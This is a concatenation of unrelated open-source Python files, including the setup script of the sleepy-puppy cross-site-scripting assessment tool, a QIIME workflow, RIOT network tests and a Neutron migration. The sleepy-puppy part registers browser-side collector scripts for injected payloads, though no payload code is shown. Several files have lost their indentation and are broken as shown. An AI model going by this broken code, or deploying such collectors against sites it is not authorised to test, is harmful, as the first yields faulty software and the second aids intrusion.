DefaultPuppyscript('Default', default_script,
'Default collects metadata for capture table including a screenshot'),
DefaultPuppyscript('Default Without Screenshot', default_without_screenshot,
'Generating a screenshot can be CPU intensive and even in some cases cause browser instability, so for some assessments this may be a better option. '),
DefaultPuppyscript(
'Alert Box', alert_box, 'Generates an alert box for notification purposes'),
DefaultPuppyscript(
'Console Log', console_log, 'Log a message in the browser\'s console'),
DefaultPuppyscript('Generic Collector: IP Address', generic_collector,
'Example showing how you can create generic JavaScripts for collecting any text data you choose. In this example we use ajax to determine IP address and record the value. ')
]
@manager.command
def create_bootstrap_assessment(name="General", add_default_payloads=True):
"""
Creates an assessment and attaches a few default payloads.
"""
from sleepypuppy.admin.assessment.models import Assessment
from sleepypuppy.admin.payload.models import Payload
from sleepypuppy.admin.puppyscript.models import Puppyscript
assessment = Assessment.query.filter(Assessment.name == name).first()
if assessment:
print("Assessment with name", name, "already exists, exiting.")
return
else:
assessment = Assessment(
name=name, access_log_enabled=False, snooze=False, run_once=False)
# add assessment
db.session.add(assessment)
db.session.commit()
existing_payload = Payload.query.filter(Payload.id == 1).first()
if existing_payload:
print("Payloads already exists, exiting.")
else:
if add_default_payloads:
for payload in DEFAULT_PAYLOADS:
payload = Payload(
payload=payload.payload,
notes=payload.notes,
ordering=u'1'
)
db.session.add(payload)
db.session.commit()
existing_puppyscript = Puppyscript.query.filter(Puppyscript.id == 1).first()
if existing_puppyscript:
print("Puppyscripts already exists, exiting.")
else:
for puppyscript in DEFAULT_JAVASCRIPTS:
puppyscript = Puppyscript(
name=puppyscript.name,
code=puppyscript.code,
notes=puppyscript.notes
)
db.session.add(puppyscript)
db.session.commit()
@manager.command
def setup_sleepy_puppy():
create_db()
create_bootstrap_assessment()
create_login('admin')
@manager.command
def list_routes():
func_list = {}
for rule in app.url_map.iter_rules():
if rule.endpoint != 'static':
func_list[rule.rule] = app.view_functions[rule.endpoint].__doc__
from pprint import pprint
pprint(func_list)
if __name__ == "__main__":
manager.add_command("clean", Clean())
manager.add_command("show_urls", ShowUrls())
manager.run()
| Netflix/sleepy-puppy | manage.py | Python | apache-2.0 | 7,364 |
# encoding: utf-8
from django.core.management.base import NoArgsCommand
from optparse import make_option
from video.management.commands.sub_commands.AddVideo import AddVideo
class Command(NoArgsCommand):
option_list = NoArgsCommand.option_list + (
make_option('--video-link',action='store',dest='video-link',
help="link to the video, use --list-types to see a list of supported link types"),
make_option('--list-types',action='store_true',dest='list-types',
help="list supported video link types and formats"),
make_option('--object-type',action='store',dest='object-type',
help="set the object type, currently only member is supported"),
make_option('--object-id',action='store',dest='object-id',
help="set the object id that the video will be related to"),
make_option('--sticky',action='store_true',dest='is_sticky',
help="set the video as sticky"),
)
def handle_noargs(self, **options):
if options.get('list-types',False):
print """Supported link formats:
youtube - http://www.youtube.com/watch?v=2sASREICzqY"""
else:
av=AddVideo(options)
av.run()
print av.ans
| noamelf/Open-Knesset | video/management/commands/add_video.py | Python | bsd-3-clause | 1,246 |
#!/usr/bin/env python
# File created on 20 Feb 2013
from __future__ import division
__author__ = "Greg Caporaso"
__copyright__ = "Copyright 2011, The QIIME project"
__credits__ = ["Greg Caporaso", "Kyle Bittinger", "Justin Kuczynski",
"Jai Ram Rideout"]
__license__ = "GPL"
__version__ = "1.9.1-dev"
__maintainer__ = "Greg Caporaso"
__email__ = "[email protected]"
from os.path import split, splitext, abspath
from qiime.util import create_dir
from qiime.workflow.util import (print_to_stdout,
generate_log_fp,
WorkflowLogger,
log_input_md5s,
get_params_str)
def run_pick_de_novo_otus(input_fp,
output_dir,
command_handler,
params,
qiime_config,
parallel=False,
logger=None,
suppress_md5=False,
status_update_callback=print_to_stdout):
""" Run the data preparation steps of Qiime
The steps performed by this function are:
1) Pick OTUs;
2) Pick a representative set;
3) Align the representative set;
4) Assign taxonomy;
5) Filter the alignment prior to tree building - remove positions
which are all gaps, and specified as 0 in the lanemask
6) Build a phylogenetic tree;
7) Build an OTU table.
"""
# Prepare some variables for the later steps
input_dir, input_filename = split(input_fp)
input_basename, input_ext = splitext(input_filename)
create_dir(output_dir)
commands = []
cluster_failures = False
if logger is None:
logger = WorkflowLogger(generate_log_fp(output_dir),
params=params,
qiime_config=qiime_config)
close_logger_on_success = True
else:
close_logger_on_success = False
if not suppress_md5:
log_input_md5s(logger, [input_fp])
# Prep the OTU picking command
try:
otu_picking_method = params['pick_otus']['otu_picking_method']
except KeyError:
otu_picking_method = 'uclust'
pick_otu_dir = '%s/%s_picked_otus' % (output_dir, otu_picking_method)
otu_fp = '%s/%s_otus.txt' % (pick_otu_dir, input_basename)
if parallel and (otu_picking_method == 'blast' or
otu_picking_method == 'uclust_ref'):
# Grab the parallel-specific parameters
try:
params_str = get_params_str(params['parallel'])
except KeyError:
params_str = ''
# Grab the OTU picker parameters
try:
# Want to find a cleaner strategy for this: the parallel script
# is method-specific, so doesn't take a --otu_picking_method
# option. This works for now though.
d = params['pick_otus'].copy()
del d['otu_picking_method']
except KeyError:
pass
if otu_picking_method == 'uclust_ref':
try:
suppress_new_clusters = d['suppress_new_clusters']
del d['suppress_new_clusters']
cluster_failures = False
except KeyError:
cluster_failures = True
failure_otu_picking_method = 'uclust'
params_str += ' %s' % get_params_str(d)
otu_picking_script = 'parallel_pick_otus_%s.py' % otu_picking_method
# Build the OTU picking command
pick_otus_cmd = '%s -i %s -o %s -T %s' % (otu_picking_script,
input_fp,
pick_otu_dir,
params_str)
else:
try:
params_str = get_params_str(params['pick_otus'])
except KeyError:
params_str = ''
# Build the OTU picking command
pick_otus_cmd = 'pick_otus.py -i %s -o %s %s' %\
(input_fp, pick_otu_dir, params_str)
commands.append([('Pick OTUs', pick_otus_cmd)])
if cluster_failures:
reference_otu_fp = otu_fp
clustered_failures_dir = '%s/failure_otus/' % pick_otu_dir
try:
d = params['pick_otus'].copy()
del d['otu_picking_method']
except KeyError:
pass
if 'denovo_otu_id_prefix' not in d:
d['denovo_otu_id_prefix'] = 'DeNovoOTU'
params_str = ' %s' % get_params_str(d)
failures_list_fp = '%s/%s_failures.txt' % \
(pick_otu_dir, input_basename)
failures_fasta_fp = '%s/%s_failures.fasta' % \
(pick_otu_dir, input_basename)
filter_fasta_cmd = 'filter_fasta.py -f %s -s %s -o %s' %\
(input_fp, failures_list_fp, failures_fasta_fp)
commands.append([('Generate failures fasta file',
filter_fasta_cmd)])
        # Prep the OTU picking command for the failure sequences
failure_otu_fp = '%s/%s_failures_otus.txt' % (clustered_failures_dir,
input_basename)
# Build the OTU picking command
pick_otus_cmd = 'pick_otus.py -i %s -o %s -m %s %s' %\
(failures_fasta_fp, clustered_failures_dir,
failure_otu_picking_method, params_str)
commands.append(
[('Pick de novo OTUs for new clusters', pick_otus_cmd)])
merged_otu_map_fp = '%s/merged_otu_map.txt' % clustered_failures_dir
cat_otu_tables_cmd = 'cat %s %s >> %s' %\
(reference_otu_fp, failure_otu_fp, merged_otu_map_fp)
commands.append([('Merge OTU maps', cat_otu_tables_cmd)])
otu_fp = merged_otu_map_fp
# Prep the representative set picking command
rep_set_dir = '%s/rep_set/' % output_dir
create_dir(rep_set_dir)
rep_set_fp = '%s/%s_rep_set.fasta' % (rep_set_dir, input_basename)
rep_set_log_fp = '%s/%s_rep_set.log' % (rep_set_dir, input_basename)
try:
params_str = get_params_str(params['pick_rep_set'])
except KeyError:
params_str = ''
# Build the representative set picking command
pick_rep_set_cmd = 'pick_rep_set.py -i %s -f %s -l %s -o %s %s' %\
(otu_fp, input_fp, rep_set_log_fp, rep_set_fp, params_str)
commands.append([('Pick representative set', pick_rep_set_cmd)])
# Prep the taxonomy assignment command
try:
assignment_method = params['assign_taxonomy']['assignment_method']
except KeyError:
assignment_method = 'uclust'
assign_taxonomy_dir = '%s/%s_assigned_taxonomy' %\
(output_dir, assignment_method)
taxonomy_fp = '%s/%s_rep_set_tax_assignments.txt' % \
(assign_taxonomy_dir, input_basename)
if parallel and (assignment_method == 'rdp' or
assignment_method == 'blast' or
assignment_method == 'uclust'):
# Grab the parallel-specific parameters
try:
params_str = get_params_str(params['parallel'])
except KeyError:
params_str = ''
# Grab the taxonomy assignment parameters
try:
# Want to find a cleaner strategy for this: the parallel script
# is method-specific, so doesn't take a --assignment_method
# option. This works for now though.
d = params['assign_taxonomy'].copy()
if 'assignment_method' in d:
del d['assignment_method']
params_str += ' %s' % get_params_str(d)
except KeyError:
pass
# Build the parallel taxonomy assignment command
assign_taxonomy_cmd = \
'parallel_assign_taxonomy_%s.py -i %s -o %s -T %s' %\
(assignment_method, rep_set_fp, assign_taxonomy_dir, params_str)
else:
try:
params_str = get_params_str(params['assign_taxonomy'])
except KeyError:
params_str = ''
# Build the taxonomy assignment command
assign_taxonomy_cmd = 'assign_taxonomy.py -o %s -i %s %s' %\
(assign_taxonomy_dir, rep_set_fp, params_str)
commands.append([('Assign taxonomy', assign_taxonomy_cmd)])
# Prep the OTU table building command
otu_table_fp = '%s/otu_table.biom' % output_dir
try:
params_str = get_params_str(params['make_otu_table'])
except KeyError:
params_str = ''
# Build the OTU table building command
make_otu_table_cmd = 'make_otu_table.py -i %s -t %s -o %s %s' %\
(otu_fp, taxonomy_fp, otu_table_fp, params_str)
commands.append([('Make OTU table', make_otu_table_cmd)])
if cluster_failures:
reference_otu_table_fp = '%s/reference_only_otu_table.biom' % output_dir
# Build the OTU table building command
make_otu_table_cmd = 'make_otu_table.py -i %s -t %s -o %s %s' %\
(reference_otu_fp, taxonomy_fp, reference_otu_table_fp, params_str)
commands.append(
[('Make reference-only OTU table', make_otu_table_cmd)])
# Prep the pynast alignment command
try:
alignment_method = params['align_seqs']['alignment_method']
except KeyError:
alignment_method = 'pynast'
pynast_dir = '%s/%s_aligned_seqs' % (output_dir, alignment_method)
aln_fp = '%s/%s_rep_set_aligned.fasta' % (pynast_dir, input_basename)
if parallel and alignment_method == 'pynast':
# Grab the parallel-specific parameters
try:
params_str = get_params_str(params['parallel'])
except KeyError:
params_str = ''
# Grab the alignment parameters
# Want to find a cleaner strategy for this: the parallel script
# is method-specific, so doesn't take a --alignment_method
# option. This works for now though.
try:
d = params['align_seqs'].copy()
except KeyError:
d = {}
try:
del d['alignment_method']
except KeyError:
pass
params_str += ' %s' % get_params_str(d)
# Build the parallel pynast alignment command
align_seqs_cmd = 'parallel_align_seqs_pynast.py -i %s -o %s -T %s' %\
(rep_set_fp, pynast_dir, params_str)
else:
try:
params_str = get_params_str(params['align_seqs'])
except KeyError:
params_str = ''
# Build the pynast alignment command
align_seqs_cmd = 'align_seqs.py -i %s -o %s %s' %\
(rep_set_fp, pynast_dir, params_str)
commands.append([('Align sequences', align_seqs_cmd)])
# Prep the alignment filtering command
filtered_aln_fp = '%s/%s_rep_set_aligned_pfiltered.fasta' %\
(pynast_dir, input_basename)
try:
params_str = get_params_str(params['filter_alignment'])
except KeyError:
params_str = ''
# Build the alignment filtering command
filter_alignment_cmd = 'filter_alignment.py -o %s -i %s %s' %\
(pynast_dir, aln_fp, params_str)
commands.append([('Filter alignment', filter_alignment_cmd)])
# Prep the tree building command
tree_fp = '%s/rep_set.tre' % output_dir
try:
params_str = get_params_str(params['make_phylogeny'])
except KeyError:
params_str = ''
# Build the tree building command
make_phylogeny_cmd = 'make_phylogeny.py -i %s -o %s %s' %\
(filtered_aln_fp, tree_fp, params_str)
commands.append([('Build phylogenetic tree', make_phylogeny_cmd)])
# Call the command handler on the list of commands
command_handler(commands,
status_update_callback,
logger=logger,
close_logger_on_success=close_logger_on_success)
return abspath(tree_fp), abspath(otu_table_fp)
run_qiime_data_preparation = run_pick_otus_through_otu_table = run_pick_de_novo_otus
def run_pick_closed_reference_otus(
input_fp,
refseqs_fp,
output_dir,
taxonomy_fp,
command_handler,
params,
qiime_config,
assign_taxonomy=False,
parallel=False,
logger=None,
suppress_md5=False,
status_update_callback=print_to_stdout):
""" Run the data preparation steps of Qiime
The steps performed by this function are:
1) Pick OTUs;
    2) If assign_taxonomy is True, choose a representative sequence
     for each OTU and assign taxonomy using a classifier.
3) Build an OTU table with optional predefined taxonomy
(if assign_taxonomy=False) or taxonomic assignments from step 2
(if assign_taxonomy=True).
"""
# confirm that a valid otu picking method was supplied before doing
# any work
reference_otu_picking_methods = ['blast', 'uclust_ref', 'usearch61_ref',
'usearch_ref', 'sortmerna']
try:
otu_picking_method = params['pick_otus']['otu_picking_method']
except KeyError:
otu_picking_method = 'uclust_ref'
assert otu_picking_method in reference_otu_picking_methods,\
"Invalid OTU picking method supplied: %s. Valid choices are: %s"\
% (otu_picking_method, ' '.join(reference_otu_picking_methods))
# Prepare some variables for the later steps
input_dir, input_filename = split(input_fp)
input_basename, input_ext = splitext(input_filename)
create_dir(output_dir)
commands = []
if logger is None:
logger = WorkflowLogger(generate_log_fp(output_dir),
params=params,
qiime_config=qiime_config)
close_logger_on_success = True
else:
close_logger_on_success = False
if not suppress_md5:
log_input_md5s(logger, [input_fp, refseqs_fp, taxonomy_fp])
# Prep the OTU picking command
pick_otu_dir = '%s/%s_picked_otus' % (output_dir, otu_picking_method)
otu_fp = '%s/%s_otus.txt' % (pick_otu_dir, input_basename)
if parallel and (otu_picking_method == 'blast' or
otu_picking_method == 'uclust_ref' or
otu_picking_method == 'usearch61_ref' or
otu_picking_method == 'sortmerna'):
# Grab the parallel-specific parameters
try:
params_str = get_params_str(params['parallel'])
except KeyError:
params_str = ''
# Grab the OTU picker parameters
try:
            # Want to find a cleaner strategy for this: the parallel script
            # is method-specific, so doesn't take a --otu_picking_method
            # option. This works for now though.
d = params['pick_otus'].copy()
if 'otu_picking_method' in d:
del d['otu_picking_method']
params_str += ' %s' % get_params_str(d)
except KeyError:
pass
otu_picking_script = 'parallel_pick_otus_%s.py' % otu_picking_method
# Build the OTU picking command
pick_otus_cmd = '%s -i %s -o %s -r %s -T %s' %\
(otu_picking_script,
input_fp,
pick_otu_dir,
refseqs_fp,
params_str)
else:
try:
params_str = get_params_str(params['pick_otus'])
except KeyError:
params_str = ''
# Since this is reference-based OTU picking we always want to
# suppress new clusters -- force it here.
params_str += ' --suppress_new_clusters'
logger.write(
"Forcing --suppress_new_clusters as this is "
"closed-reference OTU picking.\n\n")
# Build the OTU picking command
pick_otus_cmd = 'pick_otus.py -i %s -o %s -r %s -m %s %s' %\
(input_fp,
pick_otu_dir,
refseqs_fp,
otu_picking_method,
params_str)
commands.append([('Pick OTUs', pick_otus_cmd)])
# Assign taxonomy using a taxonomy classifier, if request by the user.
# (Alternatively predefined taxonomic assignments will be used, if provided.)
if assign_taxonomy:
# Prep the representative set picking command
rep_set_dir = '%s/rep_set/' % output_dir
create_dir(rep_set_dir)
rep_set_fp = '%s/%s_rep_set.fasta' % (rep_set_dir, input_basename)
rep_set_log_fp = '%s/%s_rep_set.log' % (rep_set_dir, input_basename)
try:
params_str = get_params_str(params['pick_rep_set'])
except KeyError:
params_str = ''
# Build the representative set picking command
pick_rep_set_cmd = 'pick_rep_set.py -i %s -f %s -l %s -o %s %s' %\
(otu_fp, input_fp, rep_set_log_fp, rep_set_fp, params_str)
commands.append([('Pick representative set', pick_rep_set_cmd)])
# Prep the taxonomy assignment command
try:
assignment_method = params['assign_taxonomy']['assignment_method']
except KeyError:
assignment_method = 'uclust'
assign_taxonomy_dir = '%s/%s_assigned_taxonomy' %\
(output_dir, assignment_method)
taxonomy_fp = '%s/%s_rep_set_tax_assignments.txt' % \
(assign_taxonomy_dir, input_basename)
if parallel and (assignment_method == 'rdp' or
assignment_method == 'blast' or
assignment_method == 'uclust'):
# Grab the parallel-specific parameters
try:
params_str = get_params_str(params['parallel'])
except KeyError:
params_str = ''
# Grab the taxonomy assignment parameters
try:
# Want to find a cleaner strategy for this: the parallel script
# is method-specific, so doesn't take a --assignment_method
# option. This works for now though.
d = params['assign_taxonomy'].copy()
if 'assignment_method' in d:
del d['assignment_method']
params_str += ' %s' % get_params_str(d)
except KeyError:
pass
# Build the parallel taxonomy assignment command
assign_taxonomy_cmd = \
'parallel_assign_taxonomy_%s.py -i %s -o %s -T %s' %\
(assignment_method, rep_set_fp, assign_taxonomy_dir, params_str)
else:
try:
params_str = get_params_str(params['assign_taxonomy'])
except KeyError:
params_str = ''
# Build the taxonomy assignment command
assign_taxonomy_cmd = 'assign_taxonomy.py -o %s -i %s %s' %\
(assign_taxonomy_dir, rep_set_fp, params_str)
commands.append([('Assign taxonomy', assign_taxonomy_cmd)])
# Prep the OTU table building command
otu_table_fp = '%s/otu_table.biom' % output_dir
try:
params_str = get_params_str(params['make_otu_table'])
except KeyError:
params_str = ''
# If assign_taxonomy is True, this will be the path to the taxonomic
# assignment results. If assign_taxonomy is False this will be either
# the precomputed taxonomic assignments that the user passed in,
# or None.
if taxonomy_fp:
taxonomy_str = '-t %s' % taxonomy_fp
else:
taxonomy_str = ''
# Build the OTU table building command
make_otu_table_cmd = 'make_otu_table.py -i %s %s -o %s %s' %\
(otu_fp, taxonomy_str, otu_table_fp, params_str)
commands.append([('Make OTU table', make_otu_table_cmd)])
# Call the command handler on the list of commands
command_handler(commands,
status_update_callback,
logger=logger,
close_logger_on_success=close_logger_on_success)
run_pick_reference_otus_through_otu_table = run_pick_closed_reference_otus
| adamrp/qiime | qiime/workflow/upstream.py | Python | gpl-2.0 | 19,937 |
#! /usr/bin/env python3
# -*- coding: utf-8 -*-
# vim:fenc=utf-8
#
# Copyright © 2016 Martine Lenders <[email protected]>
#
# Distributed under terms of the MIT license.
from __future__ import print_function
import os
import sys
import random
import subprocess
import time
import types
import pexpect
DEFAULT_TIMEOUT = 5
class Strategy(object):
def __init__(self, func=None):
if func is not None:
if sys.version_info < (3,):
self.__class__.execute = types.MethodType(func, self, self.__class__)
else:
self.__class__.execute = types.MethodType(func, self)
def execute(self, *args, **kwargs):
raise NotImplementedError()
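# Illustrative use of the function-injection pattern above (names are
# examples, not part of this script):
#
#   def my_execute(self, *args, **kwargs):
#       print("custom strategy:", args)
#
#   Strategy(my_execute).execute("foo")   # prints: custom strategy: ('foo',)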
class ApplicationStrategy(Strategy):
def __init__(self, app_dir=os.getcwd(), func=None):
super(ApplicationStrategy, self).__init__(func)
self.app_dir = app_dir
class BoardStrategy(Strategy):
def __init__(self, board, func=None):
super(BoardStrategy, self).__init__(func)
self.board = board
    def _run_make(self, application, make_targets, env=None):
        # copy the caller's environment additions on top of os.environ,
        # instead of shadowing the `env` parameter
        run_env = os.environ.copy()
        if env is not None:
            run_env.update(env)
        run_env.update(self.board.to_env())
        cmd = ("make", "-C", application) + make_targets
        print(' '.join(cmd))
        print(subprocess.check_output(cmd, env=run_env))
def execute(self, application):
super(BoardStrategy, self).execute(application)
class CleanStrategy(BoardStrategy):
    def execute(self, application, env=None):
        self._run_make(application, ("-B", "clean"), env)
class BuildStrategy(BoardStrategy):
    def execute(self, application, env=None):
        self._run_make(application, ("all",), env)
class FlashStrategy(BoardStrategy):
    def execute(self, application, env=None):
        self._run_make(application, ("all",), env)
class ResetStrategy(BoardStrategy):
    def execute(self, application, env=None):
        self._run_make(application, ("reset",), env)
class Board(object):
def __init__(self, name, port=None, serial=None, clean=None,
build=None, flash=None,
reset=None, term=None):
def _reset_native_execute(obj, application, env=None, *args, **kwargs):
pass
if (name == "native") and (reset is None):
reset = _reset_native_execute
self.name = name
self.port = port
self.serial = serial
self.clean_strategy = CleanStrategy(self, clean)
self.build_strategy = BuildStrategy(self, build)
self.flash_strategy = FlashStrategy(self, flash)
self.reset_strategy = ResetStrategy(self, reset)
def __len__(self):
return 1
def __iter__(self):
return self
    def next(self):
        raise StopIteration()
    __next__ = next  # Python 3 iterator protocol
def __repr__(self):
return ("<Board %s,port=%s,serial=%s>" %
(repr(self.name), repr(self.port), repr(self.serial)))
def to_env(self):
env = {}
if self.name:
env['BOARD'] = self.name
if self.port:
env['PORT'] = self.port
if self.serial:
env['SERIAL'] = self.serial
return env
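    # Illustrative result (board/port values are examples):
    #   Board("samr21-xpro", port="/dev/ttyACM0").to_env()
    #   -> {'BOARD': 'samr21-xpro', 'PORT': '/dev/ttyACM0'}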
    def clean(self, application=os.getcwd(), env=None):
        self.clean_strategy.execute(application, env)
def build(self, application=os.getcwd(), env=None):
self.build_strategy.execute(application, env)
def flash(self, application=os.getcwd(), env=None):
self.flash_strategy.execute(application, env)
def reset(self, application=os.getcwd(), env=None):
self.reset_strategy.execute(application, env)
class BoardGroup(object):
def __init__(self, boards):
self.boards = boards
def __len__(self):
return len(self.boards)
def __iter__(self):
return iter(self.boards)
def __repr__(self):
return str(self.boards)
def clean(self, application=os.getcwd(), env=None):
for board in self.boards:
board.clean(application, env)
def build(self, application=os.getcwd(), env=None):
for board in self.boards:
board.build(application, env)
def flash(self, application=os.getcwd(), env=None):
for board in self.boards:
board.flash(application, env)
def reset(self, application=os.getcwd(), env=None):
for board in self.boards:
board.reset(application, env)
def default_test_case(board_group, application, env=None):
    for board in board_group:
        run_env = os.environ.copy()
        if env is not None:
            run_env.update(env)
        run_env.update(board.to_env())
        with pexpect.spawnu("make", ["-C", application, "term"], env=run_env,
timeout=DEFAULT_TIMEOUT,
logfile=sys.stdout) as spawn:
spawn.expect("TEST: SUCCESS")
class TestStrategy(ApplicationStrategy):
def execute(self, board_groups, test_cases=[default_test_case],
timeout=DEFAULT_TIMEOUT, env=None):
for board_group in board_groups:
print("Testing for %s: " % board_group)
for test_case in test_cases:
board_group.reset()
                test_case(board_group, self.app_dir, env=env)
sys.stdout.write('.')
sys.stdout.flush()
print()
def get_ipv6_address(spawn):
spawn.sendline(u"ifconfig")
spawn.expect(u"[A-Za-z0-9]{2}_[0-9]+: inet6 (fe80::[0-9a-f:]+)")
return spawn.match.group(1)
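# The regex above assumes RIOT/lwIP shell `ifconfig` output along the lines
# of (interface name and address are examples):
#   ET_0: inet6 fe80::5848:11ff:fe65:d331
# and returns the captured link-local address.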
def test_ipv6_send(board_group, application, env=None):
env_sender = os.environ.copy()
if env is not None:
env_sender.update(env)
env_sender.update(board_group.boards[0].to_env())
env_receiver = os.environ.copy()
if env is not None:
env_receiver.update(env)
env_receiver.update(board_group.boards[1].to_env())
with pexpect.spawnu("make", ["-C", application, "term"], env=env_sender,
timeout=DEFAULT_TIMEOUT) as sender, \
pexpect.spawnu("make", ["-C", application, "term"], env=env_receiver,
timeout=DEFAULT_TIMEOUT) as receiver:
ipprot = random.randint(0x00, 0xff)
receiver_ip = get_ipv6_address(receiver)
receiver.sendline(u"ip server start %d" % ipprot)
# wait for neighbor discovery to be done
time.sleep(5)
sender.sendline(u"ip send %s %d 01:23:45:67:89:ab:cd:ef" % (receiver_ip, ipprot))
sender.expect_exact(u"Success: send 8 byte over IPv6 to %s (next header: %d)" %
(receiver_ip, ipprot))
receiver.expect(u"00000000 01 23 45 67 89 AB CD EF")
def test_udpv6_send(board_group, application, env=None):
env_sender = os.environ.copy()
if env is not None:
env_sender.update(env)
env_sender.update(board_group.boards[0].to_env())
env_receiver = os.environ.copy()
if env is not None:
env_receiver.update(env)
env_receiver.update(board_group.boards[1].to_env())
with pexpect.spawnu("make", ["-C", application, "term"], env=env_sender,
timeout=DEFAULT_TIMEOUT) as sender, \
pexpect.spawnu("make", ["-C", application, "term"], env=env_receiver,
timeout=DEFAULT_TIMEOUT) as receiver:
port = random.randint(0x0000, 0xffff)
receiver_ip = get_ipv6_address(receiver)
receiver.sendline(u"udp server start %d" % port)
# wait for neighbor discovery to be done
time.sleep(5)
sender.sendline(u"udp send %s %d ab:cd:ef" % (receiver_ip, port))
sender.expect_exact(u"Success: send 3 byte over UDP to [%s]:%d" %
(receiver_ip, port))
receiver.expect(u"00000000 AB CD EF")
def test_tcpv6_send(board_group, application, env=None):
env_client = os.environ.copy()
if env is not None:
env_client.update(env)
env_client.update(board_group.boards[0].to_env())
env_server = os.environ.copy()
if env is not None:
env_server.update(env)
env_server.update(board_group.boards[1].to_env())
with pexpect.spawnu("make", ["-C", application, "term"], env=env_client,
timeout=DEFAULT_TIMEOUT) as client, \
pexpect.spawnu("make", ["-C", application, "term"], env=env_server,
timeout=DEFAULT_TIMEOUT) as server:
port = random.randint(0x0000, 0xffff)
server_ip = get_ipv6_address(server)
client_ip = get_ipv6_address(client)
server.sendline(u"tcp server start %d" % port)
# wait for neighbor discovery to be done
time.sleep(5)
client.sendline(u"tcp connect %s %d" % (server_ip, port))
server.expect(u"TCP client \\[%s\\]:[0-9]+ connected" % client_ip)
client.sendline(u"tcp send affe:abe")
client.expect_exact(u"Success: send 4 byte over TCP to server")
server.expect(u"00000000 AF FE AB E0")
client.sendline(u"tcp disconnect")
client.sendline(u"tcp send affe:abe")
client.expect_exact(u"could not send")
def test_triple_send(board_group, application, env=None):
env_sender = os.environ.copy()
if env is not None:
env_sender.update(env)
env_sender.update(board_group.boards[0].to_env())
env_receiver = os.environ.copy()
if env is not None:
env_receiver.update(env)
env_receiver.update(board_group.boards[1].to_env())
with pexpect.spawnu("make", ["-C", application, "term"], env=env_sender,
timeout=DEFAULT_TIMEOUT) as sender, \
pexpect.spawnu("make", ["-C", application, "term"], env=env_receiver,
timeout=DEFAULT_TIMEOUT) as receiver:
udp_port = random.randint(0x0000, 0xffff)
tcp_port = random.randint(0x0000, 0xffff)
ipprot = random.randint(0x00, 0xff)
receiver_ip = get_ipv6_address(receiver)
sender_ip = get_ipv6_address(sender)
receiver.sendline(u"ip server start %d" % ipprot)
receiver.sendline(u"udp server start %d" % udp_port)
receiver.sendline(u"tcp server start %d" % tcp_port)
# wait for neighbor discovery to be done
time.sleep(5)
sender.sendline(u"udp send %s %d 01:23" % (receiver_ip, udp_port))
sender.expect_exact(u"Success: send 2 byte over UDP to [%s]:%d" %
(receiver_ip, udp_port))
receiver.expect(u"00000000 01 23")
sender.sendline(u"ip send %s %d 01:02:03:04" % (receiver_ip, ipprot))
sender.expect_exact(u"Success: send 4 byte over IPv6 to %s (next header: %d)" %
(receiver_ip, ipprot))
receiver.expect(u"00000000 01 02 03 04")
sender.sendline(u"tcp connect %s %d" % (receiver_ip, tcp_port))
receiver.expect(u"TCP client \\[%s\\]:[0-9]+ connected" % sender_ip)
sender.sendline(u"tcp send dead:beef")
sender.expect_exact(u"Success: send 4 byte over TCP to server")
receiver.expect(u"00000000 DE AD BE EF")
if __name__ == "__main__":
TestStrategy().execute([BoardGroup((Board("native", "tap0"),
Board("native", "tap1")))],
[test_ipv6_send, test_udpv6_send, test_tcpv6_send,
test_triple_send])
| BytesGalore/RIOT | tests/lwip/tests/01-run.py | Python | lgpl-2.1 | 11,453 |
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Keras Applications are canned architectures with pre-trained weights."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.keras.applications import inception_v3
from tensorflow.python.keras.applications import mobilenet
from tensorflow.python.keras.applications import resnet50
from tensorflow.python.keras.applications import vgg16
from tensorflow.python.keras.applications import vgg19
from tensorflow.python.keras.applications import xception
from tensorflow.python.keras.applications.inception_v3 import InceptionV3
from tensorflow.python.keras.applications.mobilenet import MobileNet
from tensorflow.python.keras.applications.resnet50 import ResNet50
from tensorflow.python.keras.applications.vgg16 import VGG16
from tensorflow.python.keras.applications.vgg19 import VGG19
from tensorflow.python.keras.applications.xception import Xception
del absolute_import
del division
del print_function
| tornadozou/tensorflow | tensorflow/python/keras/applications/__init__.py | Python | apache-2.0 | 1,675 |
# vim: tabstop=4 shiftwidth=4 softtabstop=4
#
# Copyright 2013 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
"""Extra dhcp opts support
Revision ID: 53bbd27ec841
Revises: 40dffbf4b549
Create Date: 2013-05-09 15:36:50.485036
"""
# revision identifiers, used by Alembic.
revision = '53bbd27ec841'
down_revision = '40dffbf4b549'
# Change to ['*'] if this migration applies to all plugins
migration_for_plugins = [
'neutron.plugins.openvswitch.ovs_neutron_plugin.OVSNeutronPluginV2'
]
from alembic import op
import sqlalchemy as sa
from neutron.db import migration
def upgrade(active_plugins=None, options=None):
if not migration.should_run(active_plugins, migration_for_plugins):
return
op.create_table(
'extradhcpopts',
sa.Column('id', sa.String(length=36), nullable=False),
sa.Column('port_id', sa.String(length=36), nullable=False),
sa.Column('opt_name', sa.String(length=64), nullable=False),
sa.Column('opt_value', sa.String(length=255), nullable=False),
sa.ForeignKeyConstraint(['port_id'], ['ports.id'], ondelete='CASCADE'),
sa.PrimaryKeyConstraint('id'),
sa.UniqueConstraint('port_id', 'opt_name', name='uidx_portid_optname'))
def downgrade(active_plugins=None, options=None):
if not migration.should_run(active_plugins, migration_for_plugins):
return
### commands auto generated by Alembic - please adjust! ###
op.drop_table('extradhcpopts')
### end Alembic commands ###
| ntt-sic/neutron | neutron/db/migration/alembic_migrations/versions/53bbd27ec841_extra_dhcp_opts_supp.py | Python | apache-2.0 | 2,051 |
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
